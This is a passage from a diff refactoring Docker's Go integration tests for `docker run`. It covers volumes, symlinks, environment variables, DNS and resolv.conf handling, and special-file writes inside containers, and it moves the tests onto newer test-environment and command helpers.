- if daemonPlatform == "windows" && strings.ToLower(dir[:1]) != "c" { + if testEnv.OSType == "windows" && strings.ToLower(dir[:1]) != "c" { c.Skip("Requires TEMP to point to C: drive") } @@ -400,8 +405,8 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { } f.Close() - if daemonPlatform == "windows" { - dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir %s\nRUN mklink /D c:\\test %s", WindowsBaseImage, dir, dir) + if testEnv.OSType == "windows" { + dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir %s\nRUN mklink /D c:\\test %s", testEnv.PlatformDefaults.BaseImage, dir, dir) containerPath = `c:\test\test` cmd = "tasklist" } else { @@ -409,10 +414,7 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { containerPath = "/test/test" cmd = "true" } - if _, err := buildImage(name, dockerFile, false); err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name, build.WithDockerfile(dockerFile)) dockerCmd(c, "run", "-v", containerPath, name, cmd) } @@ -423,13 +425,13 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir2(c *check.C) { containerPath string cmd string ) - // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // This test cannot run on a Windows daemon as // Windows does not support symlinks inside a volume path testRequires(c, SameHostDaemon, DaemonIsLinux) name := "test-volume-symlink2" - if daemonPlatform == "windows" { - dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir c:\\%s\nRUN mklink /D c:\\test c:\\%s", WindowsBaseImage, name, name) + if testEnv.OSType == "windows" { + dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir c:\\%s\nRUN mklink /D c:\\test c:\\%s", testEnv.PlatformDefaults.BaseImage, name, name) containerPath = `c:\test\test` cmd = "tasklist" } else { @@ -437,33 +439,22 @@ func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir2(c *check.C) { containerPath = "/test/test" cmd = "true" } - if _, err := buildImage(name, dockerFile, false); err != nil { - c.Fatal(err) - } - + 
buildImageSuccessfully(c, name, build.WithDockerfile(dockerFile)) dockerCmd(c, "run", "-v", containerPath, name, cmd) } func (s *DockerSuite) TestRunVolumesMountedAsReadonly(c *check.C) { - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform == "windows" && windowsDaemonKV < 14350 { - c.Skip("Needs later Windows build for RO volumes") - } if _, code, err := dockerCmdWithError("run", "-v", "/test:/test:ro", "busybox", "touch", "/test/somefile"); err == nil || code == 0 { c.Fatalf("run should fail because volume is ro: exit code %d", code) } } func (s *DockerSuite) TestRunVolumesFromInReadonlyModeFails(c *check.C) { - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform == "windows" && windowsDaemonKV < 14350 { - c.Skip("Needs later Windows build for RO volumes") - } var ( volumeDir string fileInVol string ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volumeDir = `c:/test` // Forward-slash as using busybox fileInVol = `c:/test/file` } else { @@ -484,7 +475,7 @@ func (s *DockerSuite) TestRunVolumesFromInReadWriteMode(c *check.C) { volumeDir string fileInVol string ) - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volumeDir = `c:/test` // Forward-slash as using busybox fileInVol = `c:/test/file` } else { @@ -505,16 +496,12 @@ func (s *DockerSuite) TestRunVolumesFromInReadWriteMode(c *check.C) { func (s *DockerSuite) TestVolumesFromGetsProperMode(c *check.C) { testRequires(c, SameHostDaemon) prefix, slash := getPrefixAndSlashFromDaemonPlatform() - hostpath := randomTmpDirPath("test", daemonPlatform) + hostpath := RandomTmpDirPath("test", testEnv.OSType) if err := os.MkdirAll(hostpath, 0755); err != nil { c.Fatalf("Failed to create %s: %q", hostpath, err) } defer os.RemoveAll(hostpath) - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform == "windows" && windowsDaemonKV < 14350 { - c.Skip("Needs later Windows 
build for RO volumes") - } dockerCmd(c, "run", "--name", "parent", "-v", hostpath+":"+prefix+slash+"test:ro", "busybox", "true") // Expect this "rw" mode to be be ignored since the inherited volume is "ro" @@ -532,11 +519,11 @@ func (s *DockerSuite) TestVolumesFromGetsProperMode(c *check.C) { // Test for GH#10618 func (s *DockerSuite) TestRunNoDupVolumes(c *check.C) { - path1 := randomTmpDirPath("test1", daemonPlatform) - path2 := randomTmpDirPath("test2", daemonPlatform) + path1 := RandomTmpDirPath("test1", testEnv.OSType) + path2 := RandomTmpDirPath("test2", testEnv.OSType) someplace := ":/someplace" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Windows requires that the source directory exists before calling HCS testRequires(c, SameHostDaemon) someplace = `:c:\someplace` @@ -585,7 +572,7 @@ func (s *DockerSuite) TestRunNoDupVolumes(c *check.C) { // Test for #1351 func (s *DockerSuite) TestRunApplyVolumesFromBeforeVolumes(c *check.C) { prefix := "" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { prefix = `c:` } dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo") @@ -594,7 +581,7 @@ func (s *DockerSuite) TestRunApplyVolumesFromBeforeVolumes(c *check.C) { func (s *DockerSuite) TestRunMultipleVolumesFrom(c *check.C) { prefix := "" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { prefix = `c:` } dockerCmd(c, "run", "--name", "parent1", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo") @@ -624,7 +611,7 @@ func (s *DockerSuite) TestRunVerifyContainerID(c *check.C) { // Test that creating a container with a volume doesn't crash. Regression test for #995. 
func (s *DockerSuite) TestRunCreateVolume(c *check.C) { prefix := "" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { prefix = `c:` } dockerCmd(c, "run", "-v", prefix+"/var/lib/data", "busybox", "true") @@ -635,13 +622,14 @@ func (s *DockerSuite) TestRunCreateVolume(c *check.C) { func (s *DockerSuite) TestRunCreateVolumeWithSymlink(c *check.C) { // Cannot run on Windows as relies on Linux-specific functionality (sh -c mount...) testRequires(c, DaemonIsLinux) + workingDirectory, err := ioutil.TempDir("", "TestRunCreateVolumeWithSymlink") image := "docker-test-createvolumewithsymlink" buildCmd := exec.Command(dockerBinary, "build", "-t", image, "-") buildCmd.Stdin = strings.NewReader(`FROM busybox RUN ln -s home /bar`) buildCmd.Dir = workingDirectory - err := buildCmd.Run() + err = buildCmd.Run() if err != nil { c.Fatalf("could not build '%s': %v", image, err) } @@ -667,18 +655,21 @@ func (s *DockerSuite) TestRunCreateVolumeWithSymlink(c *check.C) { // Tests that a volume path that has a symlink exists in a container mounting it with `--volumes-from`. 
func (s *DockerSuite) TestRunVolumesFromSymlinkPath(c *check.C) { - // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // This test cannot run on a Windows daemon as // Windows does not support symlinks inside a volume path testRequires(c, DaemonIsLinux) + + workingDirectory, err := ioutil.TempDir("", "TestRunVolumesFromSymlinkPath") + c.Assert(err, checker.IsNil) name := "docker-test-volumesfromsymlinkpath" prefix := "" dfContents := `FROM busybox RUN ln -s home /foo VOLUME ["/foo/bar"]` - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { prefix = `c:` - dfContents = `FROM ` + WindowsBaseImage + ` + dfContents = `FROM ` + testEnv.PlatformDefaults.BaseImage + ` RUN mkdir c:\home RUN mklink /D c:\foo c:\home VOLUME ["c:/foo/bar"] @@ -688,7 +679,7 @@ func (s *DockerSuite) TestRunVolumesFromSymlinkPath(c *check.C) { buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-") buildCmd.Stdin = strings.NewReader(dfContents) buildCmd.Dir = workingDirectory - err := buildCmd.Run() + err = buildCmd.Run() if err != nil { c.Fatalf("could not build 'docker-test-volumesfromsymlinkpath': %v", err) } @@ -722,7 +713,7 @@ func (s *DockerSuite) TestRunExitCode(c *check.C) { func (s *DockerSuite) TestRunUserDefaults(c *check.C) { expected := "uid=0(root) gid=0(root)" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = "uid=1000(ContainerAdministrator) gid=1000(ContainerAdministrator)" } out, _ := dockerCmd(c, "run", "busybox", "id") @@ -759,7 +750,7 @@ func (s *DockerSuite) TestRunUserByIDBig(c *check.C) { if err == nil { c.Fatal("No error, but must be.", out) } - if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) { + if !strings.Contains(strings.ToLower(out), "uids and gids must be in range") { c.Fatalf("expected error about uids range, got %s", out) } } @@ -772,7 +763,7 @@ func (s *DockerSuite) TestRunUserByIDNegative(c *check.C) { if err == nil { c.Fatal("No 
error, but must be.", out) } - if !strings.Contains(strings.ToUpper(out), strings.ToUpper(libcontainerUser.ErrRange.Error())) { + if !strings.Contains(strings.ToLower(out), "uids and gids must be in range") { c.Fatalf("expected error about uids range, got %s", out) } } @@ -826,21 +817,21 @@ func (s *DockerSuite) TestRunEnvironment(c *check.C) { // TODO Windows: Environment handling is different between Linux and // Windows and this test relies currently on unix functionality. testRequires(c, DaemonIsLinux) - cmd := exec.Command(dockerBinary, "run", "-h", "testing", "-e=FALSE=true", "-e=TRUE", "-e=TRICKY", "-e=HOME=", "busybox", "env") - cmd.Env = append(os.Environ(), - "TRUE=false", - "TRICKY=tri\ncky\n", - ) - - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-h", "testing", "-e=FALSE=true", "-e=TRUE", "-e=TRICKY", "-e=HOME=", "busybox", "env"}, + Env: append(os.Environ(), + "TRUE=false", + "TRICKY=tri\ncky\n", + ), + }) + result.Assert(c, icmd.Success) - actualEnv := strings.Split(strings.TrimSpace(out), "\n") + actualEnv := strings.Split(strings.TrimSuffix(result.Stdout(), "\n"), "\n") sort.Strings(actualEnv) goodEnv := []string{ + // The first two should not be tested here, those are "inherent" environment variable. 
This test validates + // the -e behavior, not the default environment variable (that could be subject to change) "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "HOSTNAME=testing", "FALSE=true", @@ -870,15 +861,13 @@ func (s *DockerSuite) TestRunEnvironmentErase(c *check.C) { // not set in our local env that they're removed (if present) in // the container - cmd := exec.Command(dockerBinary, "run", "-e", "FOO", "-e", "HOSTNAME", "busybox", "env") - cmd.Env = appendBaseEnv(true) - - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-e", "FOO", "-e", "HOSTNAME", "busybox", "env"}, + Env: appendBaseEnv(true), + }) + result.Assert(c, icmd.Success) - actualEnv := strings.Split(strings.TrimSpace(out), "\n") + actualEnv := strings.Split(strings.TrimSpace(result.Combined()), "\n") sort.Strings(actualEnv) goodEnv := []string{ @@ -904,15 +893,13 @@ func (s *DockerSuite) TestRunEnvironmentOverride(c *check.C) { // Test to make sure that when we use -e on env vars that are // already in the env that we're overriding them - cmd := exec.Command(dockerBinary, "run", "-e", "HOSTNAME", "-e", "HOME=/root2", "busybox", "env") - cmd.Env = appendBaseEnv(true, "HOSTNAME=bar") - - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-e", "HOSTNAME", "-e", "HOME=/root2", "busybox", "env"}, + Env: appendBaseEnv(true, "HOSTNAME=bar"), + }) + result.Assert(c, icmd.Success) - actualEnv := strings.Split(strings.TrimSpace(out), "\n") + actualEnv := strings.Split(strings.TrimSpace(result.Combined()), "\n") sort.Strings(actualEnv) goodEnv := []string{ @@ -932,9 +919,9 @@ func (s *DockerSuite) TestRunEnvironmentOverride(c *check.C) { } func (s *DockerSuite) TestRunContainerNetwork(c *check.C) { - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // 
Windows busybox does not have ping. Use built in ping instead. - dockerCmd(c, "run", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1") + dockerCmd(c, "run", testEnv.PlatformDefaults.BaseImage, "ping", "-n", "1", "127.0.0.1") } else { dockerCmd(c, "run", "busybox", "ping", "-c", "1", "127.0.0.1") } @@ -1232,7 +1219,7 @@ func (s *DockerSuite) TestRunModeHostname(c *check.C) { func (s *DockerSuite) TestRunRootWorkdir(c *check.C) { out, _ := dockerCmd(c, "run", "--workdir", "/", "busybox", "pwd") expected := "/\n" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = "C:" + expected } if out != expected { @@ -1241,9 +1228,9 @@ func (s *DockerSuite) TestRunRootWorkdir(c *check.C) { } func (s *DockerSuite) TestRunAllowBindMountingRoot(c *check.C) { - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Windows busybox will fail with Permission Denied on items such as pagefile.sys - dockerCmd(c, "run", "-v", `c:\:c:\host`, WindowsBaseImage, "cmd", "-c", "dir", `c:\host`) + dockerCmd(c, "run", "-v", `c:\:c:\host`, testEnv.PlatformDefaults.BaseImage, "cmd", "-c", "dir", `c:\host`) } else { dockerCmd(c, "run", "-v", "/:/host", "busybox", "ls", "/host") } @@ -1252,7 +1239,7 @@ func (s *DockerSuite) TestRunAllowBindMountingRoot(c *check.C) { func (s *DockerSuite) TestRunDisallowBindMountingRootToRoot(c *check.C) { mount := "/:/" targetDir := "/host" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { mount = `c:\:c\` targetDir = "c:/host" // Forward slash as using busybox } @@ -1301,29 +1288,29 @@ func (s *DockerSuite) TestRunDNSOptions(c *check.C) { // Not applicable on Windows as Windows does not support --dns*, or // the Unix-specific functionality of resolv.conf. 
testRequires(c, DaemonIsLinux) - out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=mydomain", "--dns-opt=ndots:9", "busybox", "cat", "/etc/resolv.conf") + result := cli.DockerCmd(c, "run", "--dns=127.0.0.1", "--dns-search=mydomain", "--dns-opt=ndots:9", "busybox", "cat", "/etc/resolv.conf") // The client will get a warning on stderr when setting DNS to a localhost address; verify this: - if !strings.Contains(stderr, "Localhost DNS setting") { - c.Fatalf("Expected warning on stderr about localhost resolver, but got %q", stderr) + if !strings.Contains(result.Stderr(), "Localhost DNS setting") { + c.Fatalf("Expected warning on stderr about localhost resolver, but got %q", result.Stderr()) } - actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1) + actual := strings.Replace(strings.Trim(result.Stdout(), "\r\n"), "\n", " ", -1) if actual != "search mydomain nameserver 127.0.0.1 options ndots:9" { c.Fatalf("expected 'search mydomain nameserver 127.0.0.1 options ndots:9', but says: %q", actual) } - out, stderr, _ = dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--dns-search=.", "--dns-opt=ndots:3", "busybox", "cat", "/etc/resolv.conf") + out := cli.DockerCmd(c, "run", "--dns=1.1.1.1", "--dns-search=.", "--dns-opt=ndots:3", "busybox", "cat", "/etc/resolv.conf").Combined() actual = strings.Replace(strings.Trim(strings.Trim(out, "\r\n"), " "), "\n", " ", -1) - if actual != "nameserver 127.0.0.1 options ndots:3" { - c.Fatalf("expected 'nameserver 127.0.0.1 options ndots:3', but says: %q", actual) + if actual != "nameserver 1.1.1.1 options ndots:3" { + c.Fatalf("expected 'nameserver 1.1.1.1 options ndots:3', but says: %q", actual) } } func (s *DockerSuite) TestRunDNSRepeatOptions(c *check.C) { testRequires(c, DaemonIsLinux) - out, _, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=1.1.1.1", "--dns=2.2.2.2", "--dns-search=mydomain", "--dns-search=mydomain2", "--dns-opt=ndots:9", "--dns-opt=timeout:3", "busybox", "cat", 
"/etc/resolv.conf") + out := cli.DockerCmd(c, "run", "--dns=1.1.1.1", "--dns=2.2.2.2", "--dns-search=mydomain", "--dns-search=mydomain2", "--dns-opt=ndots:9", "--dns-opt=timeout:3", "busybox", "cat", "/etc/resolv.conf").Stdout() actual := strings.Replace(strings.Trim(out, "\r\n"), "\n", " ", -1) if actual != "search mydomain mydomain2 nameserver 1.1.1.1 nameserver 2.2.2.2 options ndots:9 timeout:3" { @@ -1393,7 +1380,6 @@ func (s *DockerSuite) TestRunDNSOptionsBasedOnHostResolvConf(c *check.C) { c.Fatalf("/etc/resolv.conf does not exist") } - hostNameservers = resolvconf.GetNameservers(resolvConf, types.IP) hostSearch = resolvconf.GetSearchDomains(resolvConf) out, _ = dockerCmd(c, "run", "busybox", "cat", "/etc/resolv.conf") @@ -1420,10 +1406,7 @@ func (s *DockerSuite) TestRunNonRootUserResolvName(c *check.C) { dockerCmd(c, "run", "--name=testperm", "--user=nobody", "busybox", "nslookup", "apt.dockerproject.org") - cID, err := getIDByName("testperm") - if err != nil { - c.Fatal(err) - } + cID := getIDByName(c, "testperm") fmode := (os.FileMode)(0644) finfo, err := os.Stat(containerStorageFile(cID, "resolv.conf")) @@ -1461,10 +1444,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { c.Fatal(err) } if mounted { - cmd := exec.Command("umount", "/etc/resolv.conf") - if _, err = runCommand(cmd); err != nil { - c.Fatal(err) - } + icmd.RunCommand("umount", "/etc/resolv.conf").Assert(c, icmd.Success) } //cleanup @@ -1476,10 +1456,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { //1. 
test that a restarting container gets an updated resolv.conf dockerCmd(c, "run", "--name=first", "busybox", "true") - containerID1, err := getIDByName("first") - if err != nil { - c.Fatal(err) - } + containerID1 := getIDByName(c, "first") // replace resolv.conf with our temporary copy bytesResolvConf := []byte(tmpResolvConf) @@ -1491,10 +1468,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { dockerCmd(c, "start", "first") // check for update in container - containerResolv, err := readContainerFile(containerID1, "resolv.conf") - if err != nil { - c.Fatal(err) - } + containerResolv := readContainerFile(c, containerID1, "resolv.conf") if !bytes.Equal(containerResolv, bytesResolvConf) { c.Fatalf("Restarted container does not have updated resolv.conf; expected %q, got %q", tmpResolvConf, string(containerResolv)) } @@ -1506,10 +1480,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { //2. test that a restarting container does not receive resolv.conf updates // if it modified the container copy of the starting point resolv.conf dockerCmd(c, "run", "--name=second", "busybox", "sh", "-c", "echo 'search mylittlepony.com' >>/etc/resolv.conf") - containerID2, err := getIDByName("second") - if err != nil { - c.Fatal(err) - } + containerID2 := getIDByName(c, "second") //make a change to resolv.conf (in this case replacing our tmp copy with orig copy) if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { @@ -1520,11 +1491,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { dockerCmd(c, "start", "second") // check for update in container - containerResolv, err = readContainerFile(containerID2, "resolv.conf") - if err != nil { - c.Fatal(err) - } - + containerResolv = readContainerFile(c, containerID2, "resolv.conf") if bytes.Equal(containerResolv, resolvConfSystem) { c.Fatalf("Container's resolv.conf should not have been updated with host resolv.conf: %q", string(containerResolv)) } @@ -1539,11 +1506,7 @@ func 
(s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { } // check for update in container - containerResolv, err = readContainerFile(runningContainerID, "resolv.conf") - if err != nil { - c.Fatal(err) - } - + containerResolv = readContainerFile(c, runningContainerID, "resolv.conf") if bytes.Equal(containerResolv, bytesResolvConf) { c.Fatalf("Running container should not have updated resolv.conf; expected %q, got %q", string(resolvConfSystem), string(containerResolv)) } @@ -1553,10 +1516,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { dockerCmd(c, "restart", runningContainerID) // check for update in container - containerResolv, err = readContainerFile(runningContainerID, "resolv.conf") - if err != nil { - c.Fatal(err) - } + containerResolv = readContainerFile(c, runningContainerID, "resolv.conf") if !bytes.Equal(containerResolv, bytesResolvConf) { c.Fatalf("Restarted container should have updated resolv.conf; expected %q, got %q", string(bytesResolvConf), string(containerResolv)) } @@ -1575,11 +1535,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { // our first exited container ID should have been updated, but with default DNS // after the cleanup of resolv.conf found only a localhost nameserver: - containerResolv, err = readContainerFile(containerID1, "resolv.conf") - if err != nil { - c.Fatal(err) - } - + containerResolv = readContainerFile(c, containerID1, "resolv.conf") expected := "\nnameserver 8.8.8.8\nnameserver 8.8.4.4\n" if !bytes.Equal(containerResolv, []byte(expected)) { c.Fatalf("Container does not have cleaned/replaced DNS in resolv.conf; expected %q, got %q", expected, string(containerResolv)) @@ -1595,10 +1551,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { // Run the container so it picks up the old settings dockerCmd(c, "run", "--name=third", "busybox", "true") - containerID3, err := getIDByName("third") - if err != nil { - c.Fatal(err) - } + containerID3 := getIDByName(c, "third") // Create a 
modified resolv.conf.aside and override resolv.conf with it bytesResolvConf = []byte(tmpResolvConf) @@ -1615,10 +1568,7 @@ func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { dockerCmd(c, "start", "third") // check for update in container - containerResolv, err = readContainerFile(containerID3, "resolv.conf") - if err != nil { - c.Fatal(err) - } + containerResolv = readContainerFile(c, containerID3, "resolv.conf") if !bytes.Equal(containerResolv, bytesResolvConf) { c.Fatalf("Stopped container does not have updated resolv.conf; expected\n%q\n got\n%q", tmpResolvConf, string(containerResolv)) } @@ -1664,13 +1614,11 @@ func (s *DockerSuite) TestRunAttachStdOutAndErrTTYMode(c *check.C) { // Test for #10388 - this will run the same test as TestRunAttachStdOutAndErrTTYMode // but using --attach instead of -a to make sure we read the flag correctly func (s *DockerSuite) TestRunAttachWithDetach(c *check.C) { - cmd := exec.Command(dockerBinary, "run", "-d", "--attach", "stdout", "busybox", "true") - _, stderr, _, err := runCommandWithStdoutStderr(cmd) - if err == nil { - c.Fatal("Container should have exited with error code different than 0") - } else if !strings.Contains(stderr, "Conflicting options: -a and -d") { - c.Fatal("Should have been returned an error with conflicting options -a and -d") - } + icmd.RunCommand(dockerBinary, "run", "-d", "--attach", "stdout", "busybox", "true").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + Err: "Conflicting options: -a and -d", + }) } func (s *DockerSuite) TestRunState(c *check.C) { @@ -1714,15 +1662,10 @@ func (s *DockerSuite) TestRunCopyVolumeUIDGID(c *check.C) { // Not applicable on Windows as it does not support uid or gid in this way testRequires(c, DaemonIsLinux) name := "testrunvolumesuidgid" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd RUN echo 'dockerio:x:1001:' >> 
/etc/group - RUN mkdir -p /hello && touch /hello/test && chown dockerio.dockerio /hello`, - true) - if err != nil { - c.Fatal(err) - } + RUN mkdir -p /hello && touch /hello/test && chown dockerio.dockerio /hello`)) // Test that the uid and gid is copied from the image to the volume out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "sh", "-c", "ls -l / | grep hello | awk '{print $3\":\"$4}'") @@ -1734,17 +1677,12 @@ func (s *DockerSuite) TestRunCopyVolumeUIDGID(c *check.C) { // Test for #1582 func (s *DockerSuite) TestRunCopyVolumeContent(c *check.C) { - // TODO Windows, post TP5. Windows does not yet support volume functionality + // TODO Windows, post RS1. Windows does not yet support volume functionality // that copies from the image to the volume. testRequires(c, DaemonIsLinux) name := "testruncopyvolumecontent" - _, err := buildImage(name, - `FROM busybox - RUN mkdir -p /hello/local && echo hello > /hello/local/world`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + RUN mkdir -p /hello/local && echo hello > /hello/local/world`)) // Test that the content is copied from the image to the volume out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "find", "/hello") @@ -1755,13 +1693,9 @@ func (s *DockerSuite) TestRunCopyVolumeContent(c *check.C) { func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) { name := "testrunmdcleanuponentrypoint" - if _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox ENTRYPOINT ["echo"] - CMD ["testingpoint"]`, - true); err != nil { - c.Fatal(err) - } + CMD ["testingpoint"]`)) out, exit := dockerCmd(c, "run", "--entrypoint", "whoami", name) if exit != 0 { @@ -1769,15 +1703,15 @@ func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) { } out = strings.TrimSpace(out) expected := "root" - if daemonPlatform == "windows" { - if strings.Contains(WindowsBaseImage, 
"windowsservercore") { + if testEnv.OSType == "windows" { + if strings.Contains(testEnv.PlatformDefaults.BaseImage, "windowsservercore") { expected = `user manager\containeradministrator` } else { expected = `ContainerAdministrator` // nanoserver } } if out != expected { - c.Fatalf("Expected output %s, got %q. %s", expected, out, WindowsBaseImage) + c.Fatalf("Expected output %s, got %q. %s", expected, out, testEnv.PlatformDefaults.BaseImage) } } @@ -1785,7 +1719,7 @@ func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) { func (s *DockerSuite) TestRunWorkdirExistsAndIsFile(c *check.C) { existingFile := "/bin/cat" expected := "not a directory" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { existingFile = `\windows\system32\ntdll.dll` expected = `The directory name is invalid.` } @@ -1801,7 +1735,7 @@ func (s *DockerSuite) TestRunExitOnStdinClose(c *check.C) { meow := "/bin/cat" delay := 60 - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { meow = "cat" } runCmd := exec.Command(dockerBinary, "run", "--name", name, "-i", "busybox", meow) @@ -1866,17 +1800,24 @@ func (s *DockerSuite) TestRunInteractiveWithRestartPolicy(c *check.C) { }() result = icmd.WaitOnCmd(60*time.Second, result) - c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 11}) + result.Assert(c, icmd.Expected{ExitCode: 11}) } // Test for #2267 -func (s *DockerSuite) TestRunWriteHostsFileAndNotCommit(c *check.C) { - // Cannot run on Windows as Windows does not support diff. 
+func (s *DockerSuite) TestRunWriteSpecialFilesAndNotCommit(c *check.C) { + // Cannot run on Windows as this files are not present in Windows testRequires(c, DaemonIsLinux) - name := "writehosts" - out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hosts && cat /etc/hosts") + + testRunWriteSpecialFilesAndNotCommit(c, "writehosts", "/etc/hosts") + testRunWriteSpecialFilesAndNotCommit(c, "writehostname", "/etc/hostname") + testRunWriteSpecialFilesAndNotCommit(c, "writeresolv", "/etc/resolv.conf") +} + +func testRunWriteSpecialFilesAndNotCommit(c *check.C, name, path string) { + command := fmt.Sprintf("echo test2267 >> %s && cat %s", path, path) + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", command) if !strings.Contains(out, "test2267") { - c.Fatal("/etc/hosts should contain 'test2267'") + c.Fatalf("%s should contain 'test2267'", path) } out, _ = dockerCmd(c, "diff", name) @@ -1886,11 +1827,9 @@ func (s *DockerSuite) TestRunWriteHostsFileAndNotCommit(c *check.C) { } func eqToBaseDiff(out string, c *check.C) bool { - name := "eqToBaseDiff" + stringutils.GenerateRandomAlphaOnlyString(32) + name := "eqToBaseDiff" + testutil.GenerateRandomAlphaOnlyString(32) dockerCmd(c, "run", "--name", name, "busybox", "echo", "hello") - cID, err := getIDByName(name) - c.Assert(err, check.IsNil) - + cID := getIDByName(c, name) baseDiff, _ := dockerCmd(c, "diff", cID) baseArr := strings.Split(baseDiff, "\n") sort.Strings(baseArr) @@ -1913,38 +1852,6 @@ func sliceEq(a, b []string) bool { return true } -// Test for #2267 -func (s *DockerSuite) TestRunWriteHostnameFileAndNotCommit(c *check.C) { - // Cannot run on Windows as Windows does not support diff. 
- testRequires(c, DaemonIsLinux) - name := "writehostname" - out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hostname && cat /etc/hostname") - if !strings.Contains(out, "test2267") { - c.Fatal("/etc/hostname should contain 'test2267'") - } - - out, _ = dockerCmd(c, "diff", name) - if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { - c.Fatal("diff should be empty") - } -} - -// Test for #2267 -func (s *DockerSuite) TestRunWriteResolvFileAndNotCommit(c *check.C) { - // Cannot run on Windows as Windows does not support diff. - testRequires(c, DaemonIsLinux) - name := "writeresolv" - out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/resolv.conf && cat /etc/resolv.conf") - if !strings.Contains(out, "test2267") { - c.Fatal("/etc/resolv.conf should contain 'test2267'") - } - - out, _ = dockerCmd(c, "diff", name) - if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { - c.Fatal("diff should be empty") - } -} - func (s *DockerSuite) TestRunWithBadDevice(c *check.C) { // Cannot run on Windows as Windows does not support --device testRequires(c, DaemonIsLinux) @@ -1973,7 +1880,7 @@ func (s *DockerSuite) TestRunEntrypoint(c *check.C) { func (s *DockerSuite) TestRunBindMounts(c *check.C) { testRequires(c, SameHostDaemon) - if daemonPlatform == "linux" { + if testEnv.OSType == "linux" { testRequires(c, DaemonIsLinux, NotUserNamespace) } @@ -1987,17 +1894,14 @@ func (s *DockerSuite) TestRunBindMounts(c *check.C) { defer os.RemoveAll(tmpDir) writeFile(path.Join(tmpDir, "touch-me"), "", c) - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform != "windows" || windowsDaemonKV >= 14350 { - // Test reading from a read-only bind mount - out, _ := dockerCmd(c, "run", "-v", fmt.Sprintf("%s:%s/tmp:ro", tmpDir, prefix), "busybox", "ls", prefix+"/tmp") - if !strings.Contains(out, "touch-me") { - c.Fatal("Container failed to read from bind 
